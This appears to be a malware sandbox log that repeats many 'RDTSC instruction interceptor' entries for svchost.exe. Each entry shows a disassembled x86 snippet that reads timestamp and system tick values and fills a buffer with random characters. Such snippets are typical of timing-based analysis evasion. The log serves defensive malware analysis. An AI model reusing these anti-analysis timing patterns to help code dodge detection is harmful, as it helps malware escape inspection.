Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F7D6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59510h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F876h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F8F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F876h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59150h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59515h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59550h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59810h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59193h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59515h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594D3h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
